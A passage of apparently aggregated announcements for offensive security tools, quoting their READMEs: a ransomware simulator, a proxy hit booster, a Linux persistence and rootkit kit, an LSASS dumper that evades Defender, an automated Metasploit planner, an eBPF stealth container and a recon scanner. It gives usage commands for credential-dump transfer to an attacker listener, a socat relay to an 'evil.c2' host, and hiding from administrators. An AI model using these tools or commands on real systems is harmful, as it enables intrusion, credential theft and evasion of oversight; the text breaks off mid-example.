Important: This tool should only be used in controlled environments where all participants have given consent. Do not use this tool on any system without explicit permission. For more, read SECURE

Requirements

  • Python 3.x
  • cryptography
  • colorama

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/RansomwareSim.git
  2. Navigate to the project directory:

    cd RansomwareSim
  3. Install the required dependencies:

    pip install -r requirements.txt

 My Book

Running the Control Server

  1. Open controlpanel.py.
  2. Start the server by running controlpanel.py.
  3. The server will listen for connections from RansomwareSim and the Decoder.

Running the Simulator

  1. Navigate to the directory containing RansomwareSim.
  2. Modify the main function in encoder.py to specify the target directory and other parameters.
  3. Run encoder.py to start the encryption process.
  4. Follow the instructions displayed on the console.

Running the Decoder

  1. Run decoder.py after the files have been encrypted.
  2. Follow the prompts to input the decryption key.

Disclaimer

RansomwareSim is developed for educational purposes only. The creators of RansomwareSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

Contributing

Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions.

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:



PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

By: Zion3R
4 January 2024 at 11:30


PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

Features:

  • Utilizes a list of proxy IP addresses from a specified file.
  • Supports both HTTP and HTTPS proxies.
  • Allows users to input the target website URL, proxy file path, and a static port.
  • Makes HTTP requests to the specified website using each proxy.
  • Parses HTML content to extract and visit links on the webpage.

Usage:

  • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
  • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
  • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
  • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
  • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get New Proxies with port and add in proxies.txt in this format 50.168.163.176:80
  • You can add it from here: https://free-proxy-list.net/ these free proxies are not validated some might not work so first validate these proxies before adding.

How to Use:

  1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
  1. Install dependencies:
pip3 install -r requirements.txt
  1. Run the script:
python3 PhantomCrawler.py

Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


Snapshots:

If you find this GitHub repo useful, please consider giving it a star! 



D3m0n1z3dShell - Demonized Shell Is An Advanced Tool For Persistence In Linux

By: Zion3R
5 January 2024 at 11:30


Demonized Shell is an Advanced Tool for persistence in linux.


Install

git clone https://github.com/MatheuZSecurity/D3m0n1z3dShell.git
cd D3m0n1z3dShell
chmod +x demonizedshell.sh
sudo ./demonizedshell.sh

One-Liner Install

Download D3m0n1z3dShell with all files:

curl -L https://github.com/MatheuZSecurity/D3m0n1z3dShell/archive/main.tar.gz | tar xz && cd D3m0n1z3dShell-main && sudo ./demonizedshell.sh

Load D3m0n1z3dShell statically (without the static-binaries directory):

sudo curl -s https://raw.githubusercontent.com/MatheuZSecurity/D3m0n1z3dShell/main/static/demonizedshell_static.sh -o /tmp/demonizedshell_static.sh && sudo bash /tmp/demonizedshell_static.sh

Demonized Features

  • Auto Generate SSH keypair for all users
  • APT Persistence
  • Crontab Persistence
  • Systemd User level
  • Systemd Root Level
  • Bashrc Persistence
  • Privileged user & SUID bash
  • LKM Rootkit Modified, Bypassing rkhunter & chkrootkit
  • LKM Rootkit With file encoder. persistent icmp backdoor and others features.
  • ICMP Backdoor
  • LD_PRELOAD Setup PrivEsc
  • Static Binaries For Process Monitoring, Dump credentials, Enumeration, Trolling and Others Binaries.

Pending Features

  • LD_PRELOAD Rootkit
  • Process Injection
  • install for example: curl github.com/test/test/demonized.sh | bash
  • Static D3m0n1z3dShell
  • Intercept Syscall Write from a file
  • ELF/Rootkit Anti-Reversing Technique
  • PAM Backdoor
  • rc.local Persistence
  • init.d Persistence
  • motd Persistence
  • Persistence via php webshell and aspx webshell

And other types of features that will come in the future.

Contribution

If you want to contribute and help with the tool, please contact me on twitter: @MatheuzSecurity

Note

We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.



Valid8Proxy - Tool Designed For Fetching, Validating, And Storing Working Proxies

By: Zion3R
6 January 2024 at 11:30


Valid8Proxy is a versatile and user-friendly tool designed for fetching, validating, and storing working proxies. Whether you need proxies for web scraping, data anonymization, or testing network security, Valid8Proxy simplifies the process by providing a seamless way to obtain reliable and verified proxies.


Features:

  1. Proxy Fetching: Retrieve proxies from popular proxy sources with a single command.
  2. Proxy Validation: Efficiently validate proxies using multithreading to save time.
  3. Save to File: Save the list of validated proxies to a file for future use.

Usage:

  1. Clone the Repository:

    git clone https://github.com/spyboy-productions/Valid8Proxy.git
  2. Navigate to the Directory:

    cd Valid8Proxy
  3. Install Dependencies:

    pip install -r requirements.txt
  4. Run the Tool:

    python Valid8Proxy.py
  5. Follow Interactive Prompts:

    • Enter the number of proxies you want to print.
    • Sit back and let Valid8Proxy fetch, validate, and display working proxies.
  6. Save to File:

    • At the end of the process, Valid8Proxy will save the list of working proxies to a file named "proxies.txt" in the same directory.
  7. Check Results:

    • Review the working proxies in the terminal with color-coded output.
    • Find the list of working proxies saved in "proxies.txt."

If you already have proxies just want to validate usee this:

python Validator.py

Follow the prompts:

Enter the path to the file containing proxies (e.g., proxy_list.txt). Enter the number of proxies you want to validate. The script will then validate the specified number of proxies using multiple threads and print the valid proxies.

Contribution:

Contributions and feature requests are welcome! If you encounter any issues or have ideas for improvement, feel free to open an issue or submit a pull request.

Snapshots:

If you find this GitHub repo useful, please consider giving it a star!



PPLBlade - Protected Process Dumper Tool

By: Zion3R
7 January 2024 at 11:30


Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.

Key functionalities:

  1. Bypassing PPL protection
  2. Obfuscating memory dump files to evade Defender signature-based detection mechanisms
  3. Uploading memory dump with RAW and SMB upload methods without dropping it onto the disk (fileless dump)

Overview of the techniques, used in this tool can be found here: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Note that PROCEXP15.SYS is listed in the source files for compiling purposes. It does not need to be transferred on the target machine alongside the PPLBlade.exe.

It’s already embedded into the PPLBlade.exe. The exploit is just a single executable.

Modes:

  1. Dump - Dump process memory using PID or Process Name
  2. Decrypt - Revert obfuscated(--obfuscate) dump file to its original state
  3. Cleanup - Do cleanup manually, in case something goes wrong on execution (Note that the option values should be the same as for the execution, we're trying to clean up)
  4. DoThatLsassThing - Dump lsass.exe using Process Explorer driver (basic poc)

Handle Modes:

  1. Direct - Opens PROCESS_ALL_ACCESS handle directly, using OpenProcess() function
  2. Procexp - Uses PROCEXP152.sys to obtain a handle
Examples:

Basic POC that uses PROCEXP152.sys to dump lsass:

PPLBlade.exe --mode dothatlsassthing

(Note that it does not XOR dump file, provide an additional obfuscate flag to enable the XOR functionality)

Upload the obfuscated LSASS dump onto a remote location:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Attacker host:

nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Deobfuscate memory dump:

PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade


CATSploit - An Automated Penetration Testing Tool Using Cyber Attack Techniques Scoring

By: Zion3R
8 January 2024 at 11:30


CATSploit is an automated penetration testing tool using Cyber Attack Techniques Scoring (CATS) method that can be used without pentester. Currently, pentesters implicitly made the selection of suitable attack techniques for target systems to be attacked. CATSploit uses system configuration information such as OS, open ports, software version collected by scanner and calculates a score value for capture eVc and detectability eVd of each attack techniques for target system. By selecting the highest score values, it is possible to select the most appropriate attack technique for the target system without hack knack(professional pentester’s skill) .

CATSploit automatically performs penetration tests in the following sequence:

  1. Information gathering and prior information input First, gathering information of target systems. CATSploit supports nmap and OpenVAS to gather information of target systems. CATSploit also supports prior information of target systems if you have.

  2. Calculating score value of attack techniques Using information obtained in the previous phase and attack techniques database, evaluation values of capture (eVc) and detectability (eVd) of each attack techniques are calculated. For each target computer, the values of each attack technique are calculated.

  3. Selection of attack techniques by using scores and make attack scenario Select attack techniques and create attack scenarios according to pre-defined policies. For example, for a policy that prioritized hard-to-detect, the attack techniques with the lowest eVd(Detectable Score) will be selected.

  4. Execution of attack scenario CATSploit executes the attack techniques according to attack scenario constructed in the previous phase. CATSploit uses Metasploit as a framework and Metasploit API to execute actual attacks.


Prerequisities

CATSploit has the following prerequisites:

  • Kali Linux 2023.2a

Installation

For Metasploit, Nmap and OpenVAS, it is assumed to be installed with the Kali Distribution.

Installing CATSploit

To install the latest version of CATSploit, please use the following commands:

Cloneing and setup
$ git clone https://github.com/catsploit/catsploit.git
$ cd catsploit
$ git clone https://github.com/catsploit/cats-helper.git
$ sudo ./setup.sh

Editing configuration file

CATSploit is a server-client configuration, and the server reads the configuration JSON file at startup. In config.json, the following fields should be modified for your environment.

  • DBMS
    • dbname: database name created for CATSploit
    • user: username of PostgreSQL
    • password: password of PostgrSQL
    • host: If you are using a database on a remote host, specify the IP address of the host
  • SCENARIO
    • generator.maxscenarios: Maximum number of scenarios to calculate (*)
  • ATTACKPF
    • msfpassword: password of MSFRPCD
    • openvas.user: username of PostgreSQL
    • openvas.password: password of PostgreSQL
    • openvas.maxhosts: Maximum number of hosts to be test at the same time (*)
    • openvas.maxchecks: Maximum number of test items to be test at the same time (*)
  • ATTACKDB
    • attack_db_dir: Path to the folder where AtackSteps are stored

(*) Adjust the number according to the specs of your machine.

Usage

To start the server, execute the following command:

$ python cats_server.py -c [CONFIG_FILE]

Next, prepare another console, start the client program, and initiate a connection to the server.

$ python catsploit.py -s [SOCKET_PATH]

After successfully connecting to the server and initializing it, the session will start.

   _________  ___________       __      _ __
/ ____/ |/_ __/ ___/____ / /___ (_) /_
/ / / /| | / / \__ \/ __ \/ / __ \/ / __/
/ /___/ ___ |/ / ___/ / /_/ / / /_/ / / /_
\____/_/ |_/_/ /____/ .___/_/\____/_/\__/
/_/

[*] Connecting to cats-server
[*] Done.
[*] Initializing server
[*] Done.
catsploit>

The client can execute a variety of commands. Each command can be executed with -h option to display the format of its arguments.

usage: [-h] {host,scenario,scan,plan,attack,post,reset,help,exit} ...

positional arguments:
{host,scenario,scan,plan,attack,post,reset,help,exit}

options:
-h, --help show this help message and exit

I've posted the commands and options below as well for reference.

host list:
show information about the hosts
usage: host list [-h]
options:
-h, --help show this help message and exit

host detail:
show more information about one host
usage: host detail [-h] host_id
positional arguments:
host_id ID of the host for which you want to show information
options:
-h, --help show this help message and exit

scenario list:
show information about the scenarios
usage: scenario list [-h]
options:
-h, --help show this help message and exit

scenario detail:
show more information about one scenario
usage: scenario detail [-h] scenario_id
positional arguments:
scenario_id ID of the scenario for which you want to show information
options:
-h, --help show this help message and exit

scan:
run network-scan and security-scan
usage: scan [-h] [--port PORT] targe t_host [target_host ...]
positional arguments:
target_host IP address to be scanned
options:
-h, --help show this help message and exit
--port PORT ports to be scanned

plan:
planning attack scenarios
usage: plan [-h] src_host_id dst_host_id
positional arguments:
src_host_id originating host
dst_host_id target host
options:
-h, --help show this help message and exit

attack:
execute attack scenario
usage: attack [-h] scenario_id
positional arguments:
scenario_id ID of the scenario you want to execute

options:
-h, --help show this help message and exit

post find-secret:
find confidential information files that can be performed on the pwned host
usage: post find-secret [-h] host_id
positional arguments:
host_id ID of the host for which you want to find confidential information
op tions:
-h, --help show this help message and exit

reset:
reset data on the server
usage: reset [-h] {system} ...
positional arguments:
{system} reset system
options:
-h, --help show this help message and exit

exit:
exit CATSploit
usage: exit [-h]
options:
-h, --help show this help message and exit

Examples

In this example, we use CATSploit to scan network, plan the attack scenario, and execute the attack.

catsploit> scan 192.168.0.0/24
Network Scanning ... 100%
[*] Total 2 hosts were discovered.
Vulnerability Scanning ... 100%
[*] Total 14 vulnerabilities were discovered.
catsploit> host list
┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┡━━━━━━ ━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━┩
│ attacker │ 0.0.0.0 │ kali │ kali 2022.4 │ True │
│ h_exbiy6 │ 192.168.0.10 │ │ Linux 3.10 - 4.11 │ False │
│ h_nhqyfq │ 192.168.0.20 │ │ Microsoft Windows 7 SP1 │ False │
└──────────┴ ───────────────┴──────────┴──────────────────────────────────┴───────┘


catsploit> host detail h_exbiy6
┏━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━┓
┃ hostID ┃ IP ┃ Hostname ┃ Platform ┃ Pwned ┃
┡━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━┩
│ h_exbiy6 │ 192.168.0.10 │ ubuntu │ ubuntu 14.04 │ False │
└──────────┴──────────────┴──────────┴──────────────┴─ ─────┘

[IP address]
┏━━━━━━━━━━━━━━┳━━━━━━━━━━┳━━━━━━┳━━━━━━━━━━━━┓
┃ ipv4 ┃ ipv4mask ┃ ipv6 ┃ ipv6prefix ┃
┡━━━━━━━━━━━━━━╇━━━━━━━━━━╇━━━━━━╇━━━━━━━━━━━━┩
│ 192.168.0.10 │ │ │ │
└──────────── ─┴──────────┴──────┴────────────┘

[Open ports]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ service ┃ product ┃ version ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp │ 21 │ ftp │ ProFTPD │ 1.3.5 │
│ 192.168.0.10 │ tcp │ 22 │ ssh │ OpenSSH │ 6.6.1p1 Ubuntu 2ubuntu2.10 │
│ 192.168.0.10 │ tcp │ 80 │ http │ Apache httpd │ 2.4.7 │
│ 192.168.0.10 │ tcp │ 445 │ netbios-ssn │ Samba smbd │ 3.X - 4.X │
│ 192.168.0.10 │ tcp │ 631 │ ipp │ CUPS │ 1.7 │
└──────────────┴───────┴──────┴─────────────┴──────────────┴────────────────────────────┘

[Vulnerabilities]
┏━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┓
┃ ip ┃ proto ┃ port ┃ vuln_name ┃ cve ┃
┡━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━┩
│ 192.168.0.10 │ tcp │ 0 │ TCP Timestamps Information Disclosure │ N/A │
│ 192.168.0.10 │ tcp │ 21 │ FTP Unencrypted Cleartext Login │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak MAC Algorithm(s) Supported (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak Encryption Algorithm(s) Supported (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak Host Key Algorithm(s) (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 22 │ Weak Key Exchange (KEX) Algorithm(s) Supported (SSH) │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Test HTTP dangerous methods │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check │ CVE-2014-3704 │
│ 192.168.0.10 │ tcp │ 80 │ Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Sensitive File Disclosure (HTTP) │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Unprotected Web App / Device Installers (HTTP) │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ Cleartext Transmission of Sensitive Information via HTTP │ N/A │
│ 192.168.0.10 │ tcp │ 80 │ jQuery < 1.9.0 XSS Vulnerability │ CVE-2012-6708 │
│ 192.168.0.10 │ tcp │ 80 │ jQuery < 1.6.3 XSS Vulnerability │ CVE-2011-4969 │
│ 192.168.0.10 │ tcp │ 80 │ Drupal 7.0 Information Disclosure Vulnerability - Active Check │ CVE-2011-3730 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS │ CVE-2016-2183 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS │ CVE-2016-6329 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Report Vulnerable Cipher Suites for HTTPS │ CVE-2020-12872 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection │ CVE-2011-3389 │
│ 192.168.0.10 │ tcp │ 631 │ SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection │ CVE-2015-0204 │
└──────────────┴───────┴──────┴─────────────────────────────────────────────────────────────────────┴───& #9472;────────────┘

[Users]
┏━━━━━━━━━━━┳━━━━━━━┓
┃ user name ┃ group ┃
┡━━━━━━━━━━━╇━━━━━━━┩
└───────────┴───────┘


catsploit> plan attacker h_exbiy6
Planning attack scenario...100%
[*] Done. 15 scenarios was planned.
[*] To check each scenario, try 'scenario list' and/or 'scenario detail'.
catsploit> scenario list
┏━━━━━━━━━━━━━┳━━━━━ ━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ scenario id ┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃ steps ┃ first attack step ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━&#947 3;━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 3d3ivc │ 0.0.0.0 │ 192.168.0.10 │ 1.0 │ 32.0 │ 1 │ exploit/multi/http/jenkins_s… │
│ 5gnsvh │ 0.0.0.0 │ 192.168.0.10 │ 1.0 │ 53.76 │ 2 │ exploit/multi/http/jenkins_s… │
│ 6nlxyc │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 48.32 │ 2 │ exploit/multi/http/jenkins_s… │
│ 8jos4z │ 0.0.0.0 │ 192.168.0.1 0 │ 0.7 │ 72.8 │ 2 │ exploit/multi/http/jenkins_s… │
│ 8kmmts │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 32.0 │ 1 │ exploit/multi/elasticsearch/… │
│ agjmma │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 24.0 │ 1 │ exploit/windows/http/managee… │
│ joglhf │ 0.0.0.0 │ 192.168.0.10 │ 70.0 │ 60.0 │ 1 │ auxiliary/scanner/ssh/ssh_lo… │
│ rmgrof │ 0.0.0.0 │ 192.168.0.10 │ 100.0 │ 32.0 │ 1 │ exploit/multi/http/drupal_dr… │
│ xuowzk │ 0.0.0.0 │ 192.168.0.10 │ 0.0 │ 24.0 │ 1 │ exploit/multi/http/struts_dm… │
│ yttv51 │ 0.0.0.0 │ 192.168.0.10 │ 0.01 │ 53.76 │ 2 │ exploit/multi/http/jenkins_s… │
│ znv76x │ 0.0.0.0 │ 192.168.0.10 │ 0.01 │ 53.76 │ 2 │ exploit/multi/http/jenkins_s… │
└─────────────┴─────────────┴────────────────┴───────┴───────┴───────┴───────────────────────────────┘

catsploit> scenario detail rmgrof
┏━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━┳━━━━━━━┳━━━━━━┓
┃ src host ip ┃ target host ip ┃ eVc ┃ eVd ┃
┡━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━╇━━━━━━━╇━━━━━━┩
│ 0.0.0.0 │ 192.168.0.10 │ 100.0 │ 32.0 │
└─────────────┴──────── ───────┴───────┴──────┘

[Steps]
┏━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━┓
┃ # ┃ step ┃ params ┃
┡━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ exploit/multi/http/drupal_drupageddon │ RHOSTS: 192.168.0.10 │
│ │ │ LHOST: 192.168.10.100 │
└───┴───────────────────────────────────────┴───────────────────────┘


catsploit> attack rmgrof
> ~> ~
> Metasploit Console Log
> ~
> ~
[+] Attack scenario succeeded!


catsploit> exit
Bye.

Disclaimer

All informations and codes are provided solely for educational purposes and/or testing your own systems.

Contact

For any inquiry, please contact the email address as follows:

[email protected]



Nysm - A Stealth Post-Exploitation Container

By: Zion3R
9 January 2024 at 11:30


A stealth post-exploitation container.

Introduction

With the raise in popularity of offensive tools based on eBPF, going from credential stealers to rootkits hiding their own PID, a question came to our mind: Would it be possible to make eBPF invisible in its own eyes? From there, we created nysm, an eBPF stealth container meant to make offensive tools fly under the radar of System Administrators, not only by hiding eBPF, but much more:

  • bpftool
  • bpflist-bpfcc
  • ps
  • top
  • sockstat
  • ss
  • rkhunter
  • chkrootkit
  • lsof
  • auditd
  • etc...

All these tools go blind to what goes through nysm. It hides:

  • New eBPF programs
  • New eBPF maps ️
  • New eBPF links 
  • New Auditd generated logs 
  • New PIDs 着
  • New sockets 

Warning This tool is a simple demonstration of eBPF capabilities as such. It is not meant to be exhaustive. Nevertheless, pull requests are more than welcome.

 

Installation

Requirements

sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y

Linux headers

cd ./nysm/src/
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

Build

cd ./nysm/src/
make

Usage

nysm is a simple program to run before the intended command:

Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

-d, --detach Run COMMAND in background
-r, --rm Self destruct after execution
-v, --verbose Produce verbose output
-h, --help Display this help
--usage Display a short usage message

Examples

Run a hidden bash:

./nysm bash

Run a hidden ssh and remove ./nysm:

./nysm -r ssh user@domain

Run a hidden socat as a daemon and remove ./nysm:

./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

How it works

In general

As eBPF cannot overwrite returned values or kernel addresses, our goal is to find the lowest level call interacting with a userspace address to overwrite its value and hide the desired objects.

To differentiate nysm events from the others, everything runs inside a seperated PID namespace.

Hide eBPF objects

bpftool has some features nysm wants to evade: bpftool prog list, bpftool map list and bpftool link list.

As any eBPF program, bpftool uses the bpf() system call, and more specifically with the BPF_PROG_GET_NEXT_ID, BPF_MAP_GET_NEXT_ID and BPF_LINK_GET_NEXT_ID commands. The result of these calls is stored in the userspace address pointed by the attr argument.

To overwrite uattr, a tracepoint is set on the bpf() entry to store the pointed address in a map. Once done, it waits for the bpf() exit tracepoint. When bpf() exists, nysm can read and write through the bpf_attr structure. After each BPF_*_GET_NEXT_ID, bpf_attr.start_id is replaced by bpf_attr.next_id.

In order to hide specific IDs, it checks bpf_attr.next_id and replaces it with the next ID that was not created in nysm.

Program, map, and link IDs are collected from security_bpf_prog(), security_bpf_map(), and bpf_link_prime().

Hide Auditd logs

Auditd receives its logs from recvfrom() which stores its messages in a buffer.

If the message received was generated by a nysm process through audit_log_end(), it replaces the message length in its nlmsghdr header by 0.

Hide PIDS

Hiding PIDs with eBPF is nothing new. nysm hides new alloc_pid() PIDs from getdents64() in /proc by changing the length of the previous record.

As getdents64() requires to loop through all its files, the eBPF instructions limit is easily reached. Therefore, nysm uses tail calls before reaching it.

Hide sockets

Hiding sockets is a big word. In fact, opened sockets are already hidden from many tools as they cannot find the process in /proc. Nevertheless, ss uses socket() with the NETLINK_SOCK_DIAG flag which returns all the currently opened sockets. After that, ss receives the result through recvmsg() in a message buffer and the returned value is the length of all these messages combined.

Here, the same method as for the PIDs is applied: the length of the previous message is modified to hide nysm sockets.

These are collected from the connect() and bind() calls.

Limitations

Even with the best effort, nysm still has some limitations.

  • Every tool that does not close their file descriptors will spot nysm processes created while they are open. For example, if ./nysm bash is running before top, the processes will not show up. But, if another process is created from that bash instance while top is still running, the new process will be spotted. The same problem occurs with sockets and tools like nethogs.

  • Kernel logs: dmesg and /var/log/kern.log, the message nysm[<PID>] is installing a program with bpf_probe_write_user helper that may corrupt user memory! will pop several times because of the eBPF verifier on nysm run.

  • Many traces written into files are left as hooking read() and write() would be too heavy (but still possible). For example /proc/net/tcp or /sys/kernel/debug/tracing/enabled_functions.

  • Hiding ss recvmsg can be challenging as a new socket can pop at the beginning of the buffer, and nysm cannot hide it with a preceding record (this does not apply to PIDs). A quick fix could be to switch place between the first one and the next legitimate socket, but what if a socket is in the buffer by itself? Therefore, nysm modifies the first socket information with hardcoded values.

  • Running bpf() with any kind of BPF_*_GET_NEXT_ID flag from a nysm child process should be avoided as it would hide every non-nysm eBPF objects.

Of course, many of these limitations must have their own solutions. Again, pull requests are more than welcome.



WebCopilot - An Automation Tool That Enumerates Subdomains Then Filters Out Xss, Sqli, Open Redirect, Lfi, Ssrf And Rce Parameters And Then Scans For Vulnerabilities

By: Zion3R
10 January 2024 at 11:30


WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

The script first enumerate all the subdomains of the given target domain using assetfinder, sublister, subfinder, amass, findomain, hackertarget, riddler and crt then do active subdomain enumeration using gobuster from SecLists wordlist then filters out all the live subdomains using dnsx then it extract titles of the subdomains using httpx & scans for subdomain takeover using subjack. Then it uses gauplus & waybackurls to crawl all the endpoints of the given subdomains then it use gf patterns to filters out xss, lfi, ssrf, sqli, open redirect & rce parameters from that given subdomains, and then it scans for vulnerabilities on the sub domains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc). Then it'll print out the result of the scan and save all the output in a specified directory.


Features

Usage

g!2m0:~ webcopilot -h
             
──────▄▀▄─────▄▀▄
─────▄█░░▀▀▀▀▀░░█▄
─▄▄──█░░░░░░░░░░░█──▄▄
█▄▄█─█░░▀░░┬░░▀░░█─█▄▄█
██╗░░░░░░░██╗███████╗██████╗░░█████╗░░█████╗░██████╗░██╗██╗░░░░░░█████╗░████████╗
░██║░░██╗░░██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗██║██║░░░░░██╔══██╗╚══██╔══╝
░╚██╗████╗██╔╝█████╗░░██████╦╝██║░░╚═╝██║░░██║██████╔╝██║██║░░░░░██║░░██║░░░██║░░░
░░████╔═████║░██╔══╝░░██╔══██╗██║░░██╗██║░░██║██╔═══╝░██║██║ ░░░░██║░░██║░░░██║░░░
░░╚██╔╝░╚██╔╝░███████╗██████╦╝╚█████╔╝╚█████╔╝██║░░░░░██║███████╗╚█████╔╝░░░██║░░░
░░░╚═╝░░░╚═╝░░╚══════╝╚═════╝░░╚════╝ ░╚════╝░╚═╝░░░░░╚═╝╚══════╝░╚════╝░░░░╚═╝░░░
[●] @h4r5h1t.hrs | G!2m0

Usage:
webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

Flags:
-d Add your target [Requried]
-o To save outputs in folder [Default: domain.com]
-t Number of threads [Default: 100]
-b Add your server for BXSS [Default: False]
-x Exclude out of scope domains [Default: False]
-s Run only Subdomain Enumeration [Default: False]
-h Show this help message

Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

Installing WebCopilot

WebCopilot requires git to install successfully. Run the following command as a root to install webcopilot

git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

Tools Used:

SubFinderSublist3rFindomaingfOpenRedireXdnsxsqlmapgobusterassetfinderhttpxkxssqsreplaceNucleidalfoxanewjqaquatoneurldedupeAmassgaupluswaybackurlscrlfuzz

Running WebCopilot

To run the tool on a target, just use the following command.

g!2m0:~ webcopilot -d bugcrowd.com

The -o command can be used to specify an output dir.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

The -s command can be used for only subdomain enumerations (Active + Passive and also get title & screenshots).

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

The -t command can be used to add thrads to your scan for faster result.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

The -b command can be used for blind xss (OOB), you can get your server from xsshunter or interact

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

The -x command can be used to exclude out of scope domains.

g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

Example

Default options looks like this:

g!2m0:~ webcopilot -d bugcrowd.com - bugcrowd
                                ──────▄▀▄─────▄▀▄
